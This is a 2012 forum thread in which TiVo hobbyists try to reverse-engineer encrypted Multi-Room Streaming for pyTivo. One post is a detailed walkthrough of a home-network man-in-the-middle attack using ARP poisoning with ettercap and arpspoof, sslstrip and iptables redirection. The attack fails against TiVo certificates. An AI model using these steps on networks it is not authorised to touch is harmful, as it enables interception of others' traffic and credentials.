TiVo Community
TiVo Community
TiVo Community
Go Back   TiVo Community > Underground Playground > TiVo Underground
TiVo Community
Reply
Forum Jump
 
Thread Tools
Old 01-13-2012, 11:03 PM   #1
bradleys
It'll be fine....
 
Join Date: Oct 2007
Posts: 2,124
No Streaming (MRS) Discovery thread?

I am surprised we haven't seen an MRS discovery thread similar to the iPad thread. I would love to see MRS from the server integrated into pytivo!

Just trying a friendly nudge...

I do realize that this may not be as easy to discover.
__________________
TiVo S2 (Retired)
TiVo Series 3 (Sold)
TiVo HD (Sold)
TiVo Premier (2 TB Upgrade)
TiVo Roamio Plus
TiVo Mini
iPad TiVo app
TiVo Stream (Sold)
Personal Video Share powered by PyTiVo
bradleys is online now   Reply With Quote
Old 01-14-2012, 12:00 PM   #2
puffdaddy
Registered User
 
Join Date: Mar 2006
Posts: 295
What were you looking to accomplish?

*Edit: saw that you wanted to have pytivo serve up MRS. I can't saw for sure, but drawing an analogy to the original MRV introduced back in sw 4.0+, the reversing done there (which ultimately lead to the creation of "tivoserver") required hacked units (both for the reversing process as well as to use tivoserver to transfer shows), so that wouldn't bode well. That said, it would be quite snazzy to have pytivo allow MRS access to its videos.*

After streaming a video, you can simply pull the drives from the MRS client and server units to look through their logs to find the request URL to initiate the stream.

IIRC, the URL was just a suffix permutation of the MRV URLs, but I can't recall if the stream setup first required a mutual certificate authentication or not. Any such authentication (if present) plus the stream encryption means there's little that can be done, unless you have a way to crack those.

Last edited by puffdaddy : 01-14-2012 at 12:07 PM. Reason: read original post more closely
puffdaddy is offline   Reply With Quote
Old 01-14-2012, 12:22 PM   #3
bradleys
It'll be fine....
 
Join Date: Oct 2007
Posts: 2,124
Quote:
mutual certificate authentication
I suspect this is correct. As I said, I suspect this is a lot easier said then done.

It was fun to follow the iPad discovery thread and I was surprised that we didn't see a similar thread evaluating some of the new functionality.

I suppose it might be happening in the shadows - or - it might just be a whole different animal and not as discoverable.

Either way - have I said that I love pyTiVo!
__________________
TiVo S2 (Retired)
TiVo Series 3 (Sold)
TiVo HD (Sold)
TiVo Premier (2 TB Upgrade)
TiVo Roamio Plus
TiVo Mini
iPad TiVo app
TiVo Stream (Sold)
Personal Video Share powered by PyTiVo
bradleys is online now   Reply With Quote
Old 01-14-2012, 12:24 PM   #4
wmcbrine
Resistance Useless
 
wmcbrine's Avatar
 
Join Date: Aug 2003
Posts: 9,115
Well, I don't have 20.2 yet. Even then, I only have one Premiere.

Of course, on the extreme end of optimism, it's possible that implementing streaming will be as simple as adding "<StreamingPermission>Yes</StreamingPermission>" to the container XML.
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
wmcbrine is offline   Reply With Quote
Old 01-14-2012, 01:04 PM   #5
bradleys
It'll be fine....
 
Join Date: Oct 2007
Posts: 2,124
Well, I suppose I will just have to be patient!

Thanks for all the work wmcbrine - it is appreciated.
__________________
TiVo S2 (Retired)
TiVo Series 3 (Sold)
TiVo HD (Sold)
TiVo Premier (2 TB Upgrade)
TiVo Roamio Plus
TiVo Mini
iPad TiVo app
TiVo Stream (Sold)
Personal Video Share powered by PyTiVo

Last edited by bradleys : 01-14-2012 at 05:00 PM.
bradleys is online now   Reply With Quote
Old 01-16-2012, 03:39 PM   #6
gonzotek
tivo_xml developer
 
gonzotek's Avatar
 
Join Date: Sep 2004
Location: Outside Phildadelphia
Posts: 2,233
Quote:
Originally Posted by wmcbrine View Post
Of course, on the extreme end of optimism, it's possible that implementing streaming will be as simple as adding "<StreamingPermission>Yes</StreamingPermission>" to the container XML.
Just tried that, after modifying your latest commit to add the tag, it's easy to see that pyTiVo is definitely sending the StreamingPermission tag in the right place (correctly CamelCased), but no change on the TiVo. I also noticed the TiVo sends some new stuff for QueryContainer:
Code:
<?xml version="1.0" encoding="utf-8"?>
<TiVoContainer xmlns="http://www.tivo.com/developer/calypso-protocol-1.6/">
<Details>
<ContentType>x-tivo-container/tivo-server</ContentType>
<SourceFormat>x-tivo-container/tivo-dvr</SourceFormat>
<Title>Mercury</Title>
<TotalItems>2</TotalItems>
</Details>
<ItemStart>0</ItemStart>
<ItemCount>2</ItemCount>
<Item>
<Details>
<ContentType>x-tivo-container/tivo-videos</ContentType>
<SourceFormat>x-tivo-container/tivo-dvr</SourceFormat>
<Title>Mercury</Title>
<UniqueId>Mercury</UniqueId>
</Details>
<Links>
<Content>
<Url>https://192.168.1.42:443/TiVoConnect?Command=QueryContainer&amp;Container=%2FNowPlaying</Url>
<ContentType>x-tivo-container/tivo-videos</ContentType>
</Content>
</Links>
</Item>
<Item>
<Details>
<ContentType>x-tivo-container/tivo-videostream</ContentType>
<SourceFormat>x-tivo-container/tivo-dvr</SourceFormat>
<Title>Mercury</Title>
<UniqueId>Mercury</UniqueId>
</Details>
<Links>
<Content>
<Url>https://192.168.1.42:443/TiVoConnect?Command=QueryContainer&amp;Container=%2FNowPlaying</Url>
<ContentType>x-tivo-container/tivo-videostream</ContentType>
</Content>
</Links>
</Item>
</TiVoContainer>
So I also tried hacking the root template to send an extra Item with a 'x-tivo-container/tivo-videostream' ContentType and with the UniqueId set to the same as the Title, but still no change. Everything looks correctly formatted, and pytivo still functions without complaint fine for push and pull transfers.

Haven't had the time to play more than that.
__________________
Follow @pytivo on Twitter for project updates and more!
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
|
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
A Web app for Roku Remote Control
gonzotek is offline   Reply With Quote
Old 01-16-2012, 07:37 PM   #7
moyekj
Registered User
 
Join Date: Jan 2006
Location: Mission Viejo, CA
Posts: 9,260
As is the norm for TiVo these days the entire MRS communication between TiVos is SSL encrypted, so packet sniffing MRS communication didn't yield anything useful for me (unlike MRV which did show useful info in the past).
__________________
Roamio Pro, Elite, Premiere
Cox - Motorola CableCards & TAs
Slingbox 350 via TiVo Mini & TiVo Stream for remote viewing

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.


To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
moyekj is offline   Reply With Quote
Old 01-17-2012, 12:24 AM   #8
wmcbrine
Resistance Useless
 
wmcbrine's Avatar
 
Join Date: Aug 2003
Posts: 9,115
Gotta get me some MITM for that.

The annoying thing for me right now is that I can't even get my Premiere to accept a transport-stream .TiVo file (from the same unit) via pyTivo. Same file via TiVo Desktop, no problem. I've got the TiVo to request the file from pyTivo, but as soon as the file starts to transfer, the TiVo drops the connection. I've copied (almost) all the TD behavior I can see by hitting it with a browser, and clearly it's not enough.

But, I digress.
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
wmcbrine is offline   Reply With Quote
Old 01-17-2012, 01:20 AM   #9
moyekj
Registered User
 
Join Date: Jan 2006
Location: Mission Viejo, CA
Posts: 9,260
Not sure how one would MITM easily with both sides of the communications being TiVos. Guess you would have to set Gateway for both TiVo network setups to go through a computer implementing MITM instead of a router.
__________________
Roamio Pro, Elite, Premiere
Cox - Motorola CableCards & TAs
Slingbox 350 via TiVo Mini & TiVo Stream for remote viewing

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.


To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
moyekj is offline   Reply With Quote
Old 01-18-2012, 01:22 AM   #10
wmcbrine
Resistance Useless
 
wmcbrine's Avatar
 
Join Date: Aug 2003
Posts: 9,115
Quote:
Originally Posted by wmcbrine View Post
The annoying thing for me right now is that I can't even get my Premiere to accept a transport-stream .TiVo file (from the same unit) via pyTivo.
Figured it out.

80+ Mbps, here we come.
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
wmcbrine is offline   Reply With Quote
Old 01-18-2012, 09:58 AM   #11
bradleys
It'll be fine....
 
Join Date: Oct 2007
Posts: 2,124
Now the fun begins!
__________________
TiVo S2 (Retired)
TiVo Series 3 (Sold)
TiVo HD (Sold)
TiVo Premier (2 TB Upgrade)
TiVo Roamio Plus
TiVo Mini
iPad TiVo app
TiVo Stream (Sold)
Personal Video Share powered by PyTiVo
bradleys is online now   Reply With Quote
Old 01-18-2012, 10:04 AM   #12
moyekj
Registered User
 
Join Date: Jan 2006
Location: Mission Viejo, CA
Posts: 9,260
Quote:
Originally Posted by wmcbrine View Post
Figured it out.

80+ Mbps, here we come.
Does mpeg2 Transport Stream container with H.264 video work as well?
__________________
Roamio Pro, Elite, Premiere
Cox - Motorola CableCards & TAs
Slingbox 350 via TiVo Mini & TiVo Stream for remote viewing

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.


To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
moyekj is offline   Reply With Quote
Old 01-18-2012, 04:09 PM   #13
wmcbrine
Resistance Useless
 
wmcbrine's Avatar
 
Join Date: Aug 2003
Posts: 9,115
So far no, it transfers but I get a blank screen. This is with 14.9.
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
wmcbrine is offline   Reply With Quote
Old 01-18-2012, 04:40 PM   #14
moyekj
Registered User
 
Join Date: Jan 2006
Location: Mission Viejo, CA
Posts: 9,260
Quote:
Originally Posted by wmcbrine View Post
So far no, it transfers but I get a blank screen. This is with 14.9.
Will be interesting to see if 20.2 works any differently. With 20.2 I noticed that choosing secondary audio (SAP) from the Info screen for TV recordings now actually works. Also txporter recently discovered that mp4 with H.264 and multiple audio streams also allows you to switch audio streams. i.e. If you want to make a video that plays on a portable player that requires 2-channel AAC but also plays on a TiVo with the original 6-channel AC3 now it's possible to do so. (maybe that already worked before 14.9/20.2 but I'm not sure). It also looks like TiVo decoder actively looks for Dolby audio stream as first choice regardless if it's the 1st or 2nd audio stream.

The interesting thing about TS container with H.264 would be to eliminate the need for MOOV atom nonsense that mp4 container requires which would also open up possibility/option for pyTivo to transcode to H.264 instead of mpeg2.
__________________
Roamio Pro, Elite, Premiere
Cox - Motorola CableCards & TAs
Slingbox 350 via TiVo Mini & TiVo Stream for remote viewing

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.


To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
moyekj is offline   Reply With Quote
Old 01-18-2012, 07:26 PM   #15
gonzotek
tivo_xml developer
 
gonzotek's Avatar
 
Join Date: Sep 2004
Location: Outside Phildadelphia
Posts: 2,233
Quote:
Originally Posted by moyekj View Post
Will be interesting to see if 20.2 works any differently. With 20.2 I noticed that choosing secondary audio (SAP) from the Info screen for TV recordings now actually works. Also txporter recently discovered that mp4 with H.264 and multiple audio streams also allows you to switch audio streams. i.e. If you want to make a video that plays on a portable player that requires 2-channel AAC but also plays on a TiVo with the original 6-channel AC3 now it's possible to do so. (maybe that already worked before 14.9/20.2 but I'm not sure). It also looks like TiVo decoder actively looks for Dolby audio stream as first choice regardless if it's the 1st or 2nd audio stream.

The interesting thing about TS container with H.264 would be to eliminate the need for MOOV atom nonsense that mp4 container requires which would also open up possibility/option for pyTivo to transcode to H.264 instead of mpeg2.
That's interesting about the multi-audio streams. Now I have to do some tests and see if I can come up with a handbrake or ffmpeg recipe that produces a file both the Roku and TiVo will accept and play.

If we get streaming enabled from pytivo, I'll be happy with mpeg2. It's faster/easier to encode when using general purpose cpus. I guess if I wanted to store content on the box, h.264 would still be preferable .
__________________
Follow @pytivo on Twitter for project updates and more!
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
|
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
A Web app for Roku Remote Control
gonzotek is offline   Reply With Quote
Old 01-19-2012, 11:38 AM   #16
wmcbrine
Resistance Useless
 
wmcbrine's Avatar
 
Join Date: Aug 2003
Posts: 9,115
My triumph was pitifully short-lived. 20.2 appears to throttle all connections, in and out, to around 20 Mbps. Perversely, MPEG-2 transfers are now faster than MP4, and program streams are the fastest of all (though not by much), turning everything on its head.

They also broke the transfer of many metadata items, even via real .TiVo files. Apart from all that, it doesn't seem much different (for pyTivo's purposes) from 14.9 -- same kinds of weirdness with transport streams, MP4 pulls still look like they're going to work but don't, etc.
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

Last edited by wmcbrine : 01-19-2012 at 01:15 PM.
wmcbrine is offline   Reply With Quote
Old 01-19-2012, 01:17 PM   #17
wmcbrine
Resistance Useless
 
wmcbrine's Avatar
 
Join Date: Aug 2003
Posts: 9,115
OK, I'm an idiot. Or, put it down to being tired... I was testing from my laptop, which was connected via G. That's where the throttle was.

Metadata is still broken, though.
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
wmcbrine is offline   Reply With Quote
Old 01-26-2012, 10:58 PM   #18
wmcbrine
Resistance Useless
 
wmcbrine's Avatar
 
Join Date: Aug 2003
Posts: 9,115
Naive attempt:

Code:
http://downloadurl&Format=x-tivo-container/tivo-videostream
does not work. I didn't expect it to, but I thought it was worth a try, since I just got streaming enabled.

In case you're wondering, x-tivo-container/tivo-videostream comes from QueryFormats:

Code:
<TiVoFormats>
  <Format>
    <ContentType>video/x-tivo-mpeg</ContentType>
    <Description/>
  </Format>
  <Format>
    <ContentType>video/x-tivo-mpeg-ts</ContentType>
    <Description/>
  </Format>
  <Format>
    <ContentType>x-tivo-container/tivo-videostream</ContentType>
    <Description/>
  </Format>
  <Format>
    <ContentType>video/x-tivo-raw-tts</ContentType>
    <Description/>
  </Format>
</TiVoFormats>
It's the only new one. Interesting that it's "x-tivo-container" where the others are "video".
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
wmcbrine is offline   Reply With Quote
Old 02-03-2012, 09:46 PM   #19
wmcbrine
Resistance Useless
 
wmcbrine's Avatar
 
Join Date: Aug 2003
Posts: 9,115
There's a Zeroconf announcement of a service associated with streaming. It looks exactly like the "tivo-videos" service, except that it's called "tivo-videostream" (other fields are identical AFAICT).

I tried having pyTivo put out an announcement for tivo-videostream, while adding to QueryFormats and QueryContainer as outlined above. So far, no luck.
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
wmcbrine is offline   Reply With Quote
Old 02-03-2012, 09:58 PM   #20
moyekj
Registered User
 
Join Date: Jan 2006
Location: Mission Viejo, CA
Posts: 9,260
I assume you already have <StreamingPermission>Yes</StreamingPermission> added to the XML container for pyTivo video shares right?
__________________
Roamio Pro, Elite, Premiere
Cox - Motorola CableCards & TAs
Slingbox 350 via TiVo Mini & TiVo Stream for remote viewing

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.


To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
moyekj is offline   Reply With Quote
Old 02-03-2012, 10:02 PM   #21
wmcbrine
Resistance Useless
 
wmcbrine's Avatar
 
Join Date: Aug 2003
Posts: 9,115
That was included under "adding to ... QueryContainer as outlined above".
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
wmcbrine is offline   Reply With Quote
Old 02-09-2012, 04:28 PM   #22
gonzotek
tivo_xml developer
 
gonzotek's Avatar
 
Join Date: Sep 2004
Location: Outside Phildadelphia
Posts: 2,233
Quote:
Originally Posted by wmcbrine View Post
Gotta get me some MITM for that.
I don't know if this'll be useful to you for Tivo/pyTivo hacking or not, but thought I'd share on the off-chance it could be.
http://mitmproxy.org/
Quote:
mitmproxy is an SSL-capable man-in-the-middle HTTP proxy. It provides a console interface that allows traffic flows to be inspected and edited on the fly.

mitmdump is the command-line version of mitmproxy, with the same functionality but without the frills. Think tcpdump for HTTP.

Intercept and modify HTTP traffic on the fly
Save HTTP conversations for later replay and analysis
Replay both HTTP clients and servers
Make scripted changes to HTTP traffic using Python
SSL interception certs generated on the fly

__________________
Follow @pytivo on Twitter for project updates and more!
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
|
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
A Web app for Roku Remote Control
gonzotek is offline   Reply With Quote
Old 02-20-2012, 12:13 PM   #23
moyekj
Registered User
 
Join Date: Jan 2006
Location: Mission Viejo, CA
Posts: 9,260
My MITM attempt

I gave MITM a serious go over the weekend. Ultimately I was not able to decrypt SSL traffic as intended but I post in details the steps I took in the hopes to encourage others to give it a shot and perhaps find a way to get it working. I think I'm close but perhaps need a different tool for SSL stripping.

NOTE: One of the most important things I learned is it's not necessary to have a hub to monitor your network traffic, since ARP poisoning can take care of making sure you can see all your switched activity from your PC.

NOTE: I also don't have linux installed at home so I used a linux installation on a thumb drive (4GB thumb drive in my case). The nice thing about that approach is if you currently have only Windows or Mac you can just install and run everything from a thumb drive without interfering at all with your Windows or Mac installation. It's better if you have a more permanent linux installation to play with, but steps below don't require that.

STEP 1 - INSTALL LINUX ON A THUMB DRIVE
(You can use Ubuntu if you want, but that means some hacking tools missing you would have to install. Backtrack 5 has most of the hacking tools needed already installed)
a. Download Backtrack Linux iso file from:
Code:
 http://www.backtrack-linux.org/downloads/
Release = BackTrack 5
WM Flavor = GNOME
Arch = 32 bit
Image = ISO
Download = Direct

(This gets you iso file BT5-GNOME-32.iso)

b. Download and install UNetbootin (to install iso file to thumb drive)
Code:
http://unetbootin.sourceforge.net/
c. Install iso on thumb drive.
1. Insert your thumb drive in USB slot
2. Start UNetbootin and select Diskimage = ISO and browse to the BT5-GNOME-32.iso
3. Leave Space used to preserve... as 0 unless you are using Ubuntu ISO instead
4. Make sure Type = USB drive and Drive is the correct thumb drive volume

STEP 2 - BOOT LINUX FROM THUMB DRIVE
a. Make sure thumb drive is in a USB slot and reboot/start your PC
b. During boot up go to your boot options screen. For my laptop running Windows I press Esc during bootup and then F9 to choose which device to boot from. Here I then choose the thumb drive

STEP 3 - GET LINUX UP AND RUNNING WITH NETWORKING ENABLED
a. At prompt type the following to start x-windows:
startx
b. Start networking as follows:
Applications-Internet-Wicd Network Manager
- If you have wired network then simply choose connect on 1st entry.
- If you have wireless network then choose "Properties" and in "Key" field enter you WPA2 password under (or whichever protection you are using). Then click on "Connect".

STEP 4 - DOWNLOAD AND INSTALL sslstrip
a. Start firefox: Applications-Internet-Firefox
b. Download sslstrip from:
Code:
 http://www.thoughtcrime.org/software/sslstrip/
c. Simply choose to save sslstrip-0.9.tar.gz to root folder
d. Unpack and install it:
gunzip -c sslstrip-0.9.tar.gz | tar xvf -
cd sslstrip-0.9
python setup.py install
cd ..

STEP 5 - COLLECT NECESSARY NETWORK INFORMATION
a. Determine the IP addresses of your Premieres on your home network. For me this is:
192.168.10.196 = LR Premiere (This is my MRS host)
192.168.10.199 = Premiere (This is my MRS client)

b. Determine name of your network interface device.
If using wired this is "eth0"
If using wireless this is "wlan0"

STEP 6a - SETUP AND RUN THE MITM ATTACK USING ettercap
a. Start a new shell by clicking on the terminal icon to the right of System
b. Install ettercap:
apt-get install ettercap
c. Edit the /etc/etter.conf file. I usually use "vi" as editor but you can use xedit graphical editor:
xedit /etc/etter.conf
d. Scroll down to section entitled "Linux" and then uncomment (remove the leading #) from the following 2 entries under "# if you use iptables"
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
e. Click on Save and then Quit
f. Now we are ready to start ettercap (Use wlan0 or eth0 interface according to wireless or wired, and replace the IP names with your Premiere IPs):
ettercap -Tqdi wlan0 -w etter.pcap -M arp:remote /192.168.10.196/ /192.168.10.199/
g. The traffic is now logged to etter.pcap file which can then be viewed using wireshark:
wireshark etter.pcap
NOTE: Stop ettercap by pressing 'q' in the ettercap window.

STEP 6b - MORE COMPLEX ALTERNATIVE TO 6a: SETUP AND RUN THE MITM ATTACK USING arpspoof & sslstrip
a. Enable ip forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

b. Use iptables to setup forwarding of port 443 traffic to port 8080:
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080

c. arp poison traffic on your network so that it routes through your PC. Specifically I choose to poison my 2 Premieres:
1. Start a new shell by clicking on the terminal icon to the right of System
2. Execute following command in that shell (use eth0 if wired, wlan0 if wireless which is my case):
arpspoof -i wlan0 -t 192.168.10.196 192.168.10.199
(Obviously substitute the 2 IPs above for whatever your 2 Premiere IPs are)

d. Start sslstrip monitoring port 8080 and logging to file strip.log:
1. Start a new shell by clicking on the terminal icon to the right of System
2. Execute following command in that shell:
sslstrip -a -k -l 8080 -w strip.log
3. Now on your client Premiere browse to your other Premiere and push inside of show details of your host Premiere. That is enough to generate traffic on port 443 (without actually starting MRS).
4. If you want to monitor the strip.log file you can open another shell and execute the following:
tail -f strip.log

NOTES:
- Ideally if this worked properly at this point strip.log would contain unencrypted traffic.
- You can use the following iptables command to actually check if any traffic is being port forwarded:
iptables -t nat -L -v
(Even though for me this shows there is some traffic on port 443 sslstrip is not doing anything with it)
- Use Ctrl-C to stop arpspoof and/or ssltrip
- If instead of 443 I repeat the above with port 80 then I do see all the traffic using sslstrip (kind of interesting to see). In order to remove forwarding you simply use -D instead of -A in the iptables command. i.e. To remove the 443 forwarding:
iptables -t nat -D PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080
Then to add port 80 forwarding instead use:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

VIEWING TRAFFIC WITH WIRESHARK
After you setup the arpspoof poisoning you can actually start wireshark to monitor network traffic as follows:
1. From command prompt start wireshark:
wireshark
2. Choose the appropriate network interface, in my case wlan0
3. Confirm there is a bunch of traffic generated between your 2 Premiere units when browsing remote Premiere and pushing inside of show details. Specifically you should look for SSLv3 and "Server Hello" which is the SSL handshaking that happens when you push into show details on remote Premiere.
4. NOTE: Click on the red 'x' to stop capturing network traffic.

In my case the arp poisoning is working fine since I can see all the traffic using wireshark. But unfortunately sslstrip is not doing what I expected which is to decrypt https traffic. I think this is probably because it was designed for web based ssl decryption (clients using web browsers) as opposed to SSL between 2 local LAN machines.

FINAL NOTE
If using Backtrack 5 thumb drive remember that because there is no perpetual file store defined as soon as you shutdown then any and all changes you made to the linux installation will be lost and need to be repeated. I made a script that does most of the above tasks for me so I don't have to repeat every time. I save the script as part of an email attachment so I can get to the script through Firefox while in Backtrack 5. i.e. A permanent linux install would be better if you have an available machine to do it or if you setup dual boot or VMWare instead.
__________________
Roamio Pro, Elite, Premiere
Cox - Motorola CableCards & TAs
Slingbox 350 via TiVo Mini & TiVo Stream for remote viewing

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.


To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

Last edited by moyekj : 02-26-2012 at 02:41 PM. Reason: Added more formatting for readibility and more notes
moyekj is offline   Reply With Quote
Old 02-20-2012, 06:21 PM   #24
tomhorsley
Registered User
 
Join Date: Jul 2010
Posts: 717
Don't know how many Live USB installations this works for, but with a Fedora USB,
you can make the usb stick with an "overlay" storage (whatever that means :-), but
the upshot is that you actually get a modifiable USB installation so you can
add packages, etc and they will be there the next time you plug in a boot from
the USB.
tomhorsley is offline   Reply With Quote
Old 02-20-2012, 07:13 PM   #25
moyekj
Registered User
 
Join Date: Jan 2006
Location: Mission Viejo, CA
Posts: 9,260
Quote:
Originally Posted by tomhorsley View Post
Don't know how many Live USB installations this works for, but with a Fedora USB,
you can make the usb stick with an "overlay" storage (whatever that means :-), but
the upshot is that you actually get a modifiable USB installation so you can
add packages, etc and they will be there the next time you plug in a boot from
the USB.
Yes, for Ubuntu you can do that as well (define persistence space for a thumb drive installation that survives reboots). I actually started with and have another USB stick with persistent Ubuntu on it. It was just easier to summarize with Backtrack 5 because it required minimal amount of extra package installations to get going. Pretty much any recent linux installation should work though. Note also that if it was just ARP poisoning necessary then something like Cain & Abel on Windows works fine for that task. However I didn't find much in the way of transparent proxy + ssl decryption tools available for Windows so became clear pretty quickly Linux was way to go, plus for me I like command line tools better anyway so Linux was a better fit. Actually I'm open to anything that will just work at this point - don't really care if it's Windows or Linux.

As a side note doing sniffing on port 80 actually provides a lot of insight on how HME applications (for Showcases menus and in TiVo My Shows screen). With help of some DNS spoofing it may be possible to get your own HME applications showing up on My Shows screen which would be interesting, but I don't want to be side-tracked at the moment.
__________________
Roamio Pro, Elite, Premiere
Cox - Motorola CableCards & TAs
Slingbox 350 via TiVo Mini & TiVo Stream for remote viewing

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.


To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

Last edited by moyekj : 02-20-2012 at 07:19 PM.
moyekj is offline   Reply With Quote
Old 02-20-2012, 10:58 PM   #26
moyekj
Registered User
 
Join Date: Jan 2006
Location: Mission Viejo, CA
Posts: 9,260
FYI I got ettercap running properly, but unfortunately it also doesn't seem to decrypt SSL properly for the TiVo communication either. I updated the instructions above indicating how to use ettercap which is actually simpler than arpspoof + sslstrip.
__________________
Roamio Pro, Elite, Premiere
Cox - Motorola CableCards & TAs
Slingbox 350 via TiVo Mini & TiVo Stream for remote viewing

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.


To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
moyekj is offline   Reply With Quote
Old 02-21-2012, 08:19 AM   #27
reneg
Registered User
 
Join Date: Jun 2002
Posts: 463
Interested novice here and certainly no security expert. Doesn't sslstrip present http to one side of the conversation? Is it possible that tivo(s) only accepts https (tls+http)?

I'm guessing a sucessful trace will involve spoofing a cert and then feeding that cert into wireshark to decrypt the data stream.

Cheering you on from the sideline.
reneg is offline   Reply With Quote
Old 02-21-2012, 08:31 PM   #28
moyekj
Registered User
 
Join Date: Jan 2006
Location: Mission Viejo, CA
Posts: 9,260
Quote:
Originally Posted by reneg View Post
Interested novice here and certainly no security expert. Doesn't sslstrip present http to one side of the conversation? Is it possible that tivo(s) only accepts https (tls+http)?
Well in my example, theoretically because of my iptables rule all port 443 traffic is redirected to port 8080 which sslstrip is then processing and passing off to the actual destination. The traffic is reaching my Premiere so it looks like sslstrip is just leaving everything alone and just passing traffic through. If it were actually downgrading to http as it's supposed to and the destination TiVo didn't like that then there would be a handshaking failure and I wouldn't be able to get to show details on the host TiVo. I think part of the complication here is that the host TiVo is using port 443 (192.168.10.196 in my example) while the client TiVo is using a different port (not a specific port but varies with each attempt).

Quote:
I'm guessing a sucessful trace will involve spoofing a cert and then feeding that cert into wireshark to decrypt the data stream.
Cheering you on from the sideline.
Well the problem is we don't have the TiVo certificate which is needed for this and if TiVo won't accept fake certificates then none of these MITM attacks are going to work from my limited understanding.

As an example I tried using similar techniques to see if I could sniff out my login and password for mail.yahoo.com but yahoo is smart enough to recognize it's being compromised and login wouldn't work while I had port redirection turned on.
__________________
Roamio Pro, Elite, Premiere
Cox - Motorola CableCards & TAs
Slingbox 350 via TiVo Mini & TiVo Stream for remote viewing

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.


To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
moyekj is offline   Reply With Quote
Old 02-21-2012, 10:39 PM   #29
reneg
Registered User
 
Join Date: Jun 2002
Posts: 463
Quote:
Originally Posted by moyekj View Post
Well in my example, theoretically because of my iptables rule all port 443 traffic is redirected to port 8080 which sslstrip is then processing and passing off to the actual destination. The traffic is reaching my Premiere so it looks like sslstrip is just leaving everything alone and just passing traffic through. If it were actually downgrading to http as it's supposed to and the destination TiVo didn't like that then there would be a handshaking failure and I wouldn't be able to get to show details on the host TiVo. I think part of the complication here is that the host TiVo is using port 443 (192.168.10.196 in my example) while the client TiVo is using a different port (not a specific port but varies with each attempt).

Well the problem is we don't have the TiVo certificate which is needed for this and if TiVo won't accept fake certificates then none of these MITM attacks are going to work from my limited understanding.

As an example I tried using similar techniques to see if I could sniff out my login and password for mail.yahoo.com but yahoo is smart enough to recognize it's being compromised and login wouldn't work while I had port redirection turned on.
I tried playing around with cain & abel and a self-signed cert generated by the program. Tivo wouldn't take it and then I was quickly over the my head.
reneg is offline   Reply With Quote
Old 02-22-2012, 01:28 AM   #30
moyekj
Registered User
 
Join Date: Jan 2006
Location: Mission Viejo, CA
Posts: 9,260
Quote:
Originally Posted by reneg View Post
I tried playing around with cain & abel and a self-signed cert generated by the program. Tivo wouldn't take it and then I was quickly over the my head.
Can you elaborate? I don't remember any option for providing self-signed certificates in Cain & Abel but maybe I missed it.
__________________
Roamio Pro, Elite, Premiere
Cox - Motorola CableCards & TAs
Slingbox 350 via TiVo Mini & TiVo Stream for remote viewing

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.


To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
moyekj is offline   Reply With Quote
Reply
Forum Jump




Thread Tools


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Advertisements

TiVo Community
Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.
vBulletin Skins by: Relivo Media

(C) 2013 Magenium Solutions - All Rights Reserved. No information may be posted elsewhere without written permission.
TiVoŽ is a registered trademark of TiVo Inc. This site is not owned or operated by TiVo Inc.
All times are GMT -5. The time now is 06:11 PM.
OUR NETWORK: MyOpenRouter | TechLore | SansaCommunity | RoboCommunity | MediaSmart Home | Explore3DTV | Dijit Community | DVR Playground |